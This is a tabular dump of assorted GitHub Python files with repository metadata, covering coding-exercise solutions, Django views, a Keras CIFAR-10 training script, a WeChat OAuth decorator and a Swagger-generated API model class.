blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1ac68e78d93c953c0944986d901463430077c9d2 | bcc4390952e8ddf257c1daa417bc06f1565e2346 | /source/ch01/sum2.py | 5109147e9a5e38a453c3b7a46c62401b2f56e02e | [
"MIT",
"GPL-3.0-only",
"GPL-1.0-or-later",
"LGPL-2.0-or-later"
] | permissive | AngelLiang/programming-in-python3-2nd-edition | 0ef80d4ba2cd096de1bb589dddf294c9d27c320c | 8f9a6ab6768a10e94daef641009288de6845245f | refs/heads/master | 2022-08-05T19:52:40.072130 | 2019-12-31T08:10:01 | 2019-12-31T08:10:01 | 230,700,866 | 1 | 0 | MIT | 2022-07-29T23:04:40 | 2019-12-29T04:09:05 | Python | UTF-8 | Python | false | false | 1,028 | py | #!/usr/bin/env python3
# Copyright (c) 2008-11 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. It is provided for educational
# purposes and is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
print("Type integers, each followed by Enter; or ^D or ^Z to finish")
total = 0
count = 0
while True:
try:
line = input()
if line:
number = int(line)
total += number
count += 1
except ValueError as err:
print(err)
continue
except EOFError:
break
if count:
print("count =", count, "total =", total, "mean =", total / count)
| [
"pl01665077@163.com"
] | pl01665077@163.com |
2efcc17f3e10fb0decca68df806443b7a7f44f08 | bd72c02af0bbd8e3fc0d0b131e3fb9a2aaa93e75 | /Stack/largest_rectangle_in_histogram.py | 95c663a2b334ed2257f15635bc5dd2630ed6f5a4 | [] | no_license | harvi7/Leetcode-Problems-Python | d3a5e8898aceb11abc4cae12e1da50061c1d352c | 73adc00f6853e821592c68f5dddf0a823cce5d87 | refs/heads/master | 2023-05-11T09:03:03.181590 | 2023-04-29T22:03:41 | 2023-04-29T22:03:41 | 222,657,838 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 605 | py | class Solution:
def largestRectangleArea(self, heights: List[int]) -> int:
if not heights or len(heights) == 0:return 0
hist_len = len(heights)
stack = []
maxArea = 0
i = 0
while i <= hist_len:
h = 0 if i == hist_len else heights[i]
if not stack or h >= heights[stack[-1]]:
stack.append(i)
else:
currMax = stack.pop()
maxArea = max(maxArea, heights[currMax] * (i if not stack else (i - 1 - stack[-1])))
i -= 1
i += 1
return maxArea | [
"iamharshvirani7@gmail.com"
] | iamharshvirani7@gmail.com |
98399b23e71e050447773e5b3aafe81bf176c63a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03722/s716342934.py | e7c9f2de48ff64e451b266c19f1a41933248d364 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | import sys
input=sys.stdin.readline
n,m=map(int,input().split())
graph=[]
for _ in range(m):
a,b,c=map(int,input().split())
graph.append([a-1,b-1,-c])
def BellmanFord(n,m,graph):
costs=[float("inf")]*n
costs[0]=0
for _ in range(n-1):
for i in range(m):
if costs[graph[i][1]]>costs[graph[i][0]]+graph[i][2]:
costs[graph[i][1]]=costs[graph[i][0]]+graph[i][2]
newcosts=[]
for i in costs:
newcosts.append(i)
for _ in range(n):
for i in range(m):
if newcosts[graph[i][1]]>newcosts[graph[i][0]]+graph[i][2]:
newcosts[graph[i][1]]=newcosts[graph[i][0]]+graph[i][2]
if newcosts[n-1]!=costs[n-1]:
return "inf"
else:
return -costs[n-1]
print(BellmanFord(n,m,graph)) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
2428731975a9ea83206a64765f3ef4a9c41eb485 | 4472e40c53ca3e1df4f9e477a6268133309b7597 | /_unittests/ut_notebooks/test_LONG_2A_notebook_3B_correction.py | bdd5996c9425a33da74130e2fd6738e43642c400 | [
"MIT"
] | permissive | amoussoubaruch/ensae_teaching_cs | 289729742608da064f07a79b10cf6cce48de1b51 | 313a6ccb8756dbaa4c52724839b69af8a5f4476e | refs/heads/master | 2021-01-16T19:31:49.734583 | 2016-09-09T08:29:58 | 2016-09-09T08:29:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,859 | py | """
@brief test log(time=620s)
notebook test
"""
import sys
import os
import unittest
try:
import src
except ImportError:
path = os.path.normpath(
os.path.abspath(
os.path.join(
os.path.split(__file__)[0],
"..",
"..")))
if path not in sys.path:
sys.path.append(path)
import src
try:
import pyquickhelper as skip_
except ImportError:
path = os.path.normpath(
os.path.abspath(
os.path.join(
os.path.split(__file__)[0],
"..",
"..",
"..",
"pyquickhelper",
"src")))
if path not in sys.path:
sys.path.append(path)
import pyquickhelper as skip_
from pyquickhelper.loghelper import fLOG
from pyquickhelper.pycode import get_temp_folder, add_missing_development_version
class TestNotebookRunner2a_3B_correction (unittest.TestCase):
def setUp(self):
add_missing_development_version(["pymyinstall", "pyensae", "pymmails"],
__file__, hide=True)
def test_notebook_runner_correction(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
from src.ensae_teaching_cs.automation.notebook_test_helper import ls_notebooks, execute_notebooks, unittest_raise_exception_notebook, clean_function_1a
temp = get_temp_folder(__file__, "temp_notebook2a_3B_correction")
keepnote = ls_notebooks("td2a")
assert len(keepnote) > 0
res = execute_notebooks(
temp, keepnote, lambda i, n: "_3B" in n and "correction" in n,
clean_function=clean_function_1a)
unittest_raise_exception_notebook(res, fLOG)
if __name__ == "__main__":
unittest.main()
| [
"xavier.dupre@ensae.fr"
] | xavier.dupre@ensae.fr |
b248edbd3bfea1ed54561ee19f126b3ef7302301 | b08d42933ac06045905d7c005ca9c114ed3aecc0 | /src/coefSubset/evaluate/ranks/twentyPercent/rank_1e96_D.py | 9dc7a74058ecda9aad5e9d179b6bcbbf0bea7a90 | [] | no_license | TanemuraKiyoto/PPI-native-detection-via-LR | d148d53f5eb60a4dda5318b371a3048e3f662725 | 897e7188b0da94e87126a4acc0c9a6ff44a64574 | refs/heads/master | 2022-12-05T11:59:01.014309 | 2020-08-10T00:41:17 | 2020-08-10T00:41:17 | 225,272,083 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,392 | py | # 9 July 2019
# Kiyoto Aramis Tanemura
# Several metrics are used to assess the performance of the trained RF model, notably native ranking. This script returns a ranking of the native protein-protein complex among a decoy set. For convenience, I will define as a function and will call in a general performance assessment script.
# Modified 11 July 2019 by Kiyoto Aramis Tanemura. To parallelize the process, I will replace the for loop for the testFileList to a multiprocessing pool.
# Modified 9 September 2019 by Kiyoto Aramis Tanemura. I will use the function to perform the calculation on one CSV file only. Thus instead of a function to import in other scripts, they will be individual jobs parallelized as individual jobs in the queue.
import os
import pandas as pd
import numpy as np
import pickle
os.chdir('/mnt/scratch/tanemur1/')
# Read the model and trainFile
testFile = '1e96.csv'
identifier = 'D'
coefFrac = 0.2
testFilePath = '/mnt/scratch/tanemur1/CASF-PPI/nonb_descriptors/complete/'
modelPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/twentyPercent/'
outputPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/evaluate/twentyPercent/ranks/'
pdbID = testFile[:4]
with open(modelPath + 'model' + identifier + '.pkl', 'rb') as f:
clf = pickle.load(f)
result = pd.DataFrame()
scoreList = []
df1 = pd.read_csv(testFilePath + testFile)
dropList = ['Unnamed: 0', 'Unnamed: 0.1', 'ref']
df1 = df1.drop(dropList, axis = 1)
df1 = df1.set_index('Pair_name')
df1 = pd.DataFrame(df1.values.T, columns = df1.index, index = df1.columns)
df1.fillna(0.0, inplace = True)
#df1 = df1.reindex(sorted(df1.columns), axis = 1)
# Keep coefficients within the given fraction when ordered by decreasing order of coefficient magnitude
coefs = pd.read_csv('/mnt/home/tanemur1/6May2019/2019-11-11/results/medianCoefs.csv', index_col = 0, header = None, names = ['coefficients'])
coefs['absVal'] = np.abs(coefs['coefficients'])
coefs.sort_values(by = 'absVal', ascending = False, inplace = True)
coefs = coefs[:int(14028 * coefFrac + 0.5)]
keepList = list(coefs.index)
del coefs
df1 = df1[keepList]
df1 = df1.reindex(sorted(df1.columns), axis = 1)
with open(modelPath + 'standardScaler' + identifier + '.pkl', 'rb') as g:
scaler = pickle.load(g)
for i in range(len(df1)):
# subtract from one row each row of the dataframe, then remove the trivial row[[i]] - row[[i]]. Also some input files have 'class' column. This is erroneous and is removed.
df2 = pd.DataFrame(df1.iloc[[i]].values - df1.values, index = df1.index, columns = df1.columns)
df2 = df2.drop(df1.iloc[[i]].index[0], axis = 0)
# Standardize inut DF using the standard scaler used for training data.
df2 = scaler.transform(df2)
# Predict class of each comparison descriptor and sum the classes to obtain score. Higher score corresponds to more native-like complex
predictions = clf.predict(df2)
score = sum(predictions)
scoreList.append(score)
# Make a new DataFrame to store the score and corresponding descriptorID. Add rank as column. Note: lower rank corresponds to more native-like complex
result = pd.DataFrame(data = {'score': scoreList}, index = df1.index.tolist()).sort_values(by = 'score', ascending = False)
result['rank'] = range(1, len(result) + 1)
with open(outputPath + pdbID + identifier + '.csv', 'w') as h:
result.to_csv(h)
| [
"tanemur1@msu.edu"
] | tanemur1@msu.edu |
661f8b888e79a6f44694634cfd74115ed4dae3e8 | 3821860187e15a4235d541e7db510732c18212b0 | /tasks/views.py | fab3922931a2e2c9190ef6eba0db6b38369398da | [] | no_license | memadd/todo | 15fb5901a87b162bb793c0b9f4c73674e38bab8f | 3ed0acc15596964c50eca863b01fdddff7f5586d | refs/heads/master | 2021-04-02T18:33:27.582092 | 2020-03-31T22:18:29 | 2020-03-31T22:18:29 | 248,308,247 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,086 | py | from django.shortcuts import render, redirect
from django.http import HttpResponse
from .models import *
from .forms import *
# Create your views here.
def index(request):
tasks = Task.objects.all()
form = TaskForm()
if request.method == 'POST':
form = TaskForm(request.POST)
if form.is_valid():
form.save()
return redirect('/')
context = {'tasks':tasks, 'form':form}
return render (request, 'tasks/list.html', context)
def update_task(request, pk):
task = Task.objects.get(id=pk)
form = TaskForm(instance=task)
if request.method == 'POST':
form = TaskForm(request.POST, instance=task)
if form.is_valid():
form.save()
return redirect('/')
context = {'form':form}
return render (request, 'tasks/update_task.html', context)
def delete_task(request, pk):
item = Task.objects.get(id=pk)
if request.method == 'POST':
item.delete()
return redirect('/')
context = {'item': item}
return render(request, 'tasks/delete.html',context) | [
"memad632@gmail.com"
] | memad632@gmail.com |
f9169b2aac3ad5c32eb0cb07c38f5fe71fefbb5f | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_205/ch84_2020_04_07_23_54_12_724713.py | 4c822726ed79558cc3825e318a52fc3229b76091 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | def inverte_dicionario (dic):
inverte = {}
for chave in dic.keys():
for valores in dic.values():
inverte[valores]=dic[valores]
return inverte | [
"you@example.com"
] | you@example.com |
76459a2392101ae49b4a1efd11c83b37c7c40025 | ef3ac1664accfe2f4f28800cb3dde383d04e2636 | /max possible score.py | 65c014f4f77dfe2708045c18bbc0c6484be1475d | [] | no_license | Shamabanu/python | 2466b253ead7249147844e22ede9017a2ffb299a | 76350525586b285773edb58912c1ba8eee35d1a6 | refs/heads/master | 2020-03-27T15:45:09.838053 | 2019-08-14T15:06:18 | 2019-08-14T15:06:18 | 146,736,750 | 3 | 6 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | def fac(c1,c2):
k=1
for m in range(c2+1,c1+1):
k*=m
return k
t=int(input())
ab=[]
for m in range(t):
ab.append(list(map(int,input().split())))
for j in ab:
n=fac(j[0],j[1])
c=0
while n>1:
x=2
while x<n+1:
if n%x==0:
n=n/x
c+=1
break
x+=1
print(c)
| [
"noreply@github.com"
] | Shamabanu.noreply@github.com |
540ddc515614afa96a6c6e81efdcad3a4d539484 | 4feaf520374804d6f3feebe3700fb448692a44ba | /pullenti/ner/org/internal/OrgItemNumberToken.py | 9a6de49d739833dc981c94e92e6055a792890f6b | [] | no_license | MihaJjDa/APCLtask | f7be3fb6b0f31801196bf779f6a7e62ce245493b | 4745b45e199887d433ab256bb2e2ebf5dbe3f7cd | refs/heads/master | 2020-04-16T17:15:10.846647 | 2020-02-24T16:06:43 | 2020-02-24T16:06:43 | 165,769,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,200 | py | # Copyright (c) 2013, Pullenti. All rights reserved. Non-Commercial Freeware.
# This class is generated using the converter UniSharping (www.unisharping.ru) from Pullenti C#.NET project (www.pullenti.ru).
# See www.pullenti.ru/downloadpage.aspx.
from pullenti.unisharp.Utils import Utils
from pullenti.ner.Token import Token
from pullenti.ner.MetaToken import MetaToken
from pullenti.ner.NumberToken import NumberToken
from pullenti.ner.TextToken import TextToken
from pullenti.ner.core.NumberHelper import NumberHelper
from pullenti.ner.core.MiscHelper import MiscHelper
class OrgItemNumberToken(MetaToken):
def __init__(self, begin : 'Token', end : 'Token') -> None:
super().__init__(begin, end, None)
self.number = None;
def __str__(self) -> str:
return "№ {0}".format(Utils.ifNotNull(self.number, "?"))
@staticmethod
def tryAttach(t : 'Token', can_be_pure_number : bool=False, typ : 'OrgItemTypeToken'=None) -> 'OrgItemNumberToken':
if (t is None):
return None
tt = Utils.asObjectOrNull(t, TextToken)
if (tt is not None):
t1 = MiscHelper.checkNumberPrefix(tt)
if ((isinstance(t1, NumberToken)) and not t1.is_newline_before):
return OrgItemNumberToken._new1704(tt, t1, str((t1).value))
if ((t.is_hiphen and (isinstance(t.next0_, NumberToken)) and not t.is_whitespace_before) and not t.is_whitespace_after):
if (NumberHelper.tryParseAge(t.next0_) is None):
return OrgItemNumberToken._new1704(t, t.next0_, str((t.next0_).value))
if (isinstance(t, NumberToken)):
if ((not t.is_whitespace_before and t.previous is not None and t.previous.is_hiphen)):
return OrgItemNumberToken._new1704(t, t, str((t).value))
if (typ is not None and typ.typ is not None and (((typ.typ == "войсковая часть" or typ.typ == "військова частина" or "колония" in typ.typ) or "колонія" in typ.typ))):
if (t.length_char >= 4 or t.length_char <= 6):
res = OrgItemNumberToken._new1704(t, t, str((t).value))
if (t.next0_ is not None and ((t.next0_.is_hiphen or t.next0_.isCharOf("\\/"))) and not t.next0_.is_whitespace_after):
if ((isinstance(t.next0_.next0_, NumberToken)) and ((t.length_char + t.next0_.next0_.length_char) < 9)):
res.end_token = t.next0_.next0_
res.number = "{0}-{1}".format(res.number, (res.end_token).value)
elif ((isinstance(t.next0_.next0_, TextToken)) and t.next0_.next0_.length_char == 1 and t.next0_.next0_.chars.is_letter):
res.end_token = t.next0_.next0_
res.number = "{0}{1}".format(res.number, (res.end_token).term)
elif ((isinstance(t.next0_, TextToken)) and t.next0_.length_char == 1 and t.next0_.chars.is_letter):
res.end_token = t.next0_
res.number = "{0}{1}".format(res.number, (res.end_token).term)
return res
if (((isinstance(t, TextToken)) and t.length_char == 1 and t.chars.is_letter) and not t.is_whitespace_after):
if (typ is not None and typ.typ is not None and (((typ.typ == "войсковая часть" or typ.typ == "військова частина" or "колония" in typ.typ) or "колонія" in typ.typ))):
tt1 = t.next0_
if (tt1 is not None and tt1.is_hiphen):
tt1 = tt1.next0_
if ((isinstance(tt1, NumberToken)) and not tt1.is_whitespace_before):
res = OrgItemNumberToken(t, tt1)
res.number = "{0}{1}".format((t).term, (tt1).value)
return res
return None
@staticmethod
def _new1704(_arg1 : 'Token', _arg2 : 'Token', _arg3 : str) -> 'OrgItemNumberToken':
res = OrgItemNumberToken(_arg1, _arg2)
res.number = _arg3
return res | [
"danila.puchkin@mail.ru"
] | danila.puchkin@mail.ru |
9fe80f0e87dfc1126fed1e23de9636b732dc37f6 | 2090b6b92d5cada89504de548b14f9c729856606 | /visualize/gmt/helpers/generate_gmt_station_list.py | a08d5762939b547fbd2afd76dd6ba239210ef41b | [] | no_license | ziyixiArchive/Japan_Slab_code | 4f6a366889278ad499971cf1132591b9029c0f8c | 4cb19939e45739faee7a8b6ec3d3a5da4549a108 | refs/heads/master | 2022-03-14T18:11:47.768695 | 2019-12-17T21:48:32 | 2019-12-17T21:48:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,098 | py | import numpy as np
import click
CEA_NETWORKS = ["AH", "BJ", "BU", "CQ", "FJ", "GD", "GS", "GX", "GZ", "HA", "HB", "HE", "HI", "HL", "HN",
"JL", "JS", "JX", "LN", "NM", "NX", "QH", "SC", "SD", "SH", "SN", "SX", "TJ", "XJ", "XZ", "YN", "ZJ"]
@click.command()
@click.option('--stations_file', required=True, type=str)
@click.option('--output_file', required=True, type=str)
def main(stations_file, output_file):
stations = np.loadtxt(stations_file, dtype=np.str)
with open(output_file, "w") as f:
for row in stations:
net = row[1]
if(net in CEA_NETWORKS):
net = 0
elif(net == "BO"):
net = 1
elif(net == "KG"):
net = 2
elif(net == "XL"):
net = 3
elif(net == "8B"):
net = 4
elif(net == "YP"):
net = 5
elif(net == "X4"):
net = 6
else:
net = 7
f.write(f"{row[3]} {row[2]} {net}\n")
if __name__ == "__main__":
main()
| [
"xiziyi@msu.edu"
] | xiziyi@msu.edu |
a212d11a29b6161c29d2539135a62e3803d7c7ca | 3f09e77f169780968eb4bd5dc24b6927ed87dfa2 | /src/Problems/Binary_Tree_Maximum_Path_Sum.py | cf6ee11ab89c3fc0ae2de014dbe7b1d837f3788f | [] | no_license | zouyuanrenren/Leetcode | ad921836256c31e31cf079cf8e671a8f865c0660 | 188b104b81e6c73792f7c803c0fa025f9413a484 | refs/heads/master | 2020-12-24T16:59:12.464615 | 2015-01-19T21:59:15 | 2015-01-19T21:59:15 | 26,719,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,726 | py | '''
Created on 21 Nov 2014
@author: zouyuanrenren
'''
'''
Given a binary tree, find the maximum path sum.
The path may start and end at any node in the tree.
For example:
Given the below binary tree,
1
/ \
2 3
Return 6.
'''
'''
The idea is simple:
1. for each node, there are 4 paths that include the node:
a. node itself
b. node + left sub-path with max sum
c. node + right sub-path with max sum
d. node + left sub-path with max sum + right sub-path with max sum
we only need to compute the largest out of the above 4 for each node
2. for each node, the sub-path with max sum that ends with the node can be:
a. node itself
b. node + left sub-path with max sum
c. node + right sub-path with max sum
we only need to compute the largest out of the above 3 for each node, so that it can be used by its parent node
3. hence we do with depth-first search and recursion
'''
# Definition for a binary tree node
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
# @param root, a tree node
# @return an integer
def maxPathSum(self, root):
if root == None:
return 0
maxlist = [None]
self.maxsum(root,maxlist)
return maxlist[0]
def maxsum(self,root,maxlist):
if root == None:
return 0
leftmax = self.maxsum(root.left,maxlist)
rightmax = self.maxsum(root.right,maxlist)
result = max(root.val,root.val+leftmax,root.val+rightmax)
current = max(result,root.val+leftmax+rightmax)
maxlist[0] = current if maxlist[0] == None else max(current, maxlist[0])
return result
| [
"y.ren@abdn.ac.uk"
] | y.ren@abdn.ac.uk |
55865bd610510d6adfb96a2195797860ebd21aa2 | a46fc5187245f7ac79758ae475d4d865e24f482b | /211_add_and_search_word/add_word.py | 10752d7d4f827bc56950070c27b991981c6095a3 | [] | no_license | narnat/leetcode | ae31f9321ac9a087244dddd64706780ea57ded91 | 20a48021be5e5348d681e910c843e734df98b596 | refs/heads/master | 2022-12-08T00:58:12.547227 | 2020-08-26T21:04:53 | 2020-08-26T21:04:53 | 257,167,879 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,417 | py | #!/usr/bin/env python
class Node:
def __init__(self):
"""
Prefix tree node
@children: child nodes
"""
self.children = 26 * [None]
self.is_end = False
class WordDictionary:
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = Node()
def addWord(self, word: str) -> None:
"""
Adds a word into the data structure.
"""
root = self.root
for c in word:
idx = ord(c) - ord('a')
if root.children[idx] is None:
root.children[idx] = Node()
root = root.children[idx]
root.is_end = True
def search(self, word: str) -> bool:
"""
Returns if the word is in the data structure. A word could contain the dot character '.' to represent any one letter.
"""
return self.search_rec(word, 0, self.root)
def search_rec(self, word, n, node):
if node is None:
return False
if n == len(word):
return node.is_end
if word[n] == '.':
for child in node.children:
if self.search_rec(word, n + 1, child):
return True
else:
idx = ord(word[n]) - ord('a')
if self.search_rec(word, n + 1, node.children[idx]):
return True
return False
| [
"farruh1996@gmail.com"
] | farruh1996@gmail.com |
87d22d165b6db77ed6dce9c200bbaaa6eb4f752f | 6b85910d57ad533b887a462082084dcef8e42bd8 | /cifar10_brn_mode_2.py | 004cf3feedfaebbd57caf7ffea8a3b1a5f0d4db3 | [] | no_license | ml-lab/BatchRenormalization | 49137cb7457f27807524500bee422c085a2fb4e8 | fdd1cd2c0da0f6105ad29852969630abeb4890c7 | refs/heads/master | 2020-05-29T21:03:29.698663 | 2017-02-20T22:31:21 | 2017-02-20T22:31:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,437 | py | import numpy as np
import json
import keras.callbacks as callbacks
from keras.datasets import cifar10
import keras.utils.np_utils as kutils
from keras import backend as K
from wrn_renorm import WideResidualNetwork
batch_size = 128
nb_epoch = 100
img_rows, img_cols = 32, 32
(trainX, trainY), (testX, testY) = cifar10.load_data()
trainX = trainX.astype('float32')
trainX /= 255.0
testX = testX.astype('float32')
testX /= 255.0
trainY = kutils.to_categorical(trainY)
testY = kutils.to_categorical(testY)
init_shape = (3, 32, 32) if K.image_dim_ordering() == 'th' else (32, 32, 3)
model = WideResidualNetwork(depth=16, width=4, weights=None, classes=10, mode=2) # mode 2
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
model.load_weights('weights/Batch renorm Weights Mode 2.h5')
# history = model.fit(trainX, trainY, batch_size, nb_epoch=nb_epoch,
# callbacks=[
# callbacks.ModelCheckpoint("weights/Batch renorm Weights Mode 2.h5", monitor="val_acc", save_best_only=True,
# save_weights_only=True)],
# validation_data=(testX, testY))
#
# with open('history/batch_renorm_mode_2_history.txt', 'w') as f:
# json.dump(history.history, f)
scores = model.evaluate(testX, testY, batch_size)
print("Test loss : %0.5f" % (scores[0]))
print("Test accuracy = %0.5f" % (scores[1]))
| [
"titu1994@gmail.com"
] | titu1994@gmail.com |
ba8acff9e53924815b665296b189e9c5a48a1694 | cb99ba5b850e5667166c9a7b318ab09f28a50da3 | /wxchat/decorators.py | f43b23f05028c480d7b5ff78d40110cb97151d10 | [] | no_license | malx927/kele | 3831714eb6335e6fb2b05d463e4c7875aa87de2b | 542b412e9e9859b03d47d289a9069b9262289897 | refs/heads/master | 2022-12-02T13:29:57.174259 | 2021-07-11T13:26:00 | 2021-07-11T13:26:00 | 130,623,335 | 0 | 1 | null | 2022-11-22T02:28:55 | 2018-04-23T01:21:14 | HTML | UTF-8 | Python | false | false | 2,631 | py | #-*-coding:utf-8-*-
import json
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import get_object_or_404
from wxchat.models import WxUserinfo
__author__ = 'malxin'
from django.conf import settings
from wechatpy.oauth import WeChatOAuth
def weixin_decorator(func):
def wrapper(request, *args, **kwargs):
code = request.GET.get('code', None)
openid = request.session.get('openid', None)
print('weixin_decorator', code, openid)
if openid is None:
if code is None: # 获取授权码code
redirect_url = '%s://%s%s' % (request.scheme, request.get_host(), request.get_full_path())
print('redirect_url=', redirect_url)
webchatOAuth = WeChatOAuth(settings.WECHAT_APPID, settings.WECHAT_SECRET, redirect_url, 'snsapi_userinfo')
authorize_url = webchatOAuth.authorize_url
return HttpResponseRedirect(authorize_url)
else: # 同意授权,通过授权码获取ticket,根据ticket拉取用户信息
webchatOAuth = WeChatOAuth(settings.WECHAT_APPID, settings.WECHAT_SECRET, '', 'snsapi_userinfo')
res = webchatOAuth.fetch_access_token(code)
if 'errcode' in res:
return HttpResponse(json.dumps(res))
else:
open_id = webchatOAuth.open_id
userinfo = webchatOAuth.get_user_info()
userinfo.pop('privilege')
obj, created = WxUserinfo.objects.update_or_create(openid=open_id, defaults=userinfo)
request.session['openid'] = open_id
userinf = get_object_or_404(WxUserinfo, openid=open_id)
request.session['nickname'] = userinf.nickname
request.session['is_member'] = userinf.is_member
request.session['headimgurl'] = userinf.headimgurl
request.session['role'] = userinf.member_role.id if userinf.member_role else 0
return func(request, *args, **kwargs)
else:
request.session['openid'] = openid
userinf = get_object_or_404(WxUserinfo, openid=openid)
request.session['nickname'] = userinf.nickname
# request.session['is_member'] = userinf.is_member
request.session['is_member'] = 1
request.session['headimgurl'] = userinf.headimgurl
request.session['role'] = userinf.member_role.id if userinf.member_role else 0
return func(request, *args, **kwargs)
return wrapper
| [
"5971158@qq.com"
] | 5971158@qq.com |
0b18106e68e7b8b158f4ee65cfb171cec8fa86ad | 886a374cc162a64f8a1f68548e7229b0354d232a | /pandajedi/jedisetup/GenTaskSetupper.py | e84219873e9314f9bf8257e191b09ff834f8b641 | [
"Apache-2.0"
] | permissive | pavlo-svirin/panda-jedi | f6cf9a4ddbb4d1525ad08de5167cf97a5f82f6a5 | 635dfbd38d85ebc8f837b06cbea1203daf291a71 | refs/heads/master | 2020-03-23T10:54:34.911666 | 2017-02-15T22:52:42 | 2017-02-15T22:52:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 602 | py | from pandajedi.jedicore.MsgWrapper import MsgWrapper
from pandajedi.jedicore import Interaction
from TaskSetupperBase import TaskSetupperBase
# logger
from pandacommon.pandalogger.PandaLogger import PandaLogger
logger = PandaLogger().getLogger(__name__.split('.')[-1])
# task setup for general purpose
class GenTaskSetupper (TaskSetupperBase):
# constructor
def __init__(self,taskBufferIF,ddmIF):
TaskSetupperBase.__init__(self,taskBufferIF,ddmIF)
# main to setup task
def doSetup(self,taskSpec,datasetToRegister,pandaJobs):
return self.SC_SUCCEEDED
| [
"tmaeno@bnl.gov"
] | tmaeno@bnl.gov |
0ee9c877642b14ad79d684f02024646632c5e64e | 62edb9b550ef41899e8d80edbd72fc66898c37b8 | /swagger_client/models/linked_artifact.py | 17552248e7be92499bab954997a82fed56eb415f | [
"Apache-2.0"
] | permissive | isabella232/qtest-swagger-client | 6a5575655b8af16f25fdde1eef056fec1c128081 | 28220aa95d878922ca4b35c325706932adabea4e | refs/heads/master | 2023-07-11T00:50:27.980979 | 2018-06-20T15:48:02 | 2018-06-20T15:48:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,941 | py | # coding: utf-8
"""
qTest Manager API Version 8.6 - 9.1
qTest Manager API Version 8.6 - 9.1
OpenAPI spec version: 8.6 - 9.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class LinkedArtifact(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, id=None, pid=None, link_type=None, _self=None):
"""
LinkedArtifact - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'id': 'int',
'pid': 'str',
'link_type': 'str',
'_self': 'str'
}
self.attribute_map = {
'id': 'id',
'pid': 'pid',
'link_type': 'link_type',
'_self': 'self'
}
self._id = id
self._pid = pid
self._link_type = link_type
self.__self = _self
@property
def id(self):
"""
Gets the id of this LinkedArtifact.
ID of linked artifact
:return: The id of this LinkedArtifact.
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this LinkedArtifact.
ID of linked artifact
:param id: The id of this LinkedArtifact.
:type: int
"""
self._id = id
@property
def pid(self):
"""
Gets the pid of this LinkedArtifact.
PID of linked artifact
:return: The pid of this LinkedArtifact.
:rtype: str
"""
return self._pid
@pid.setter
def pid(self, pid):
"""
Sets the pid of this LinkedArtifact.
PID of linked artifact
:param pid: The pid of this LinkedArtifact.
:type: str
"""
self._pid = pid
@property
def link_type(self):
"""
Gets the link_type of this LinkedArtifact.
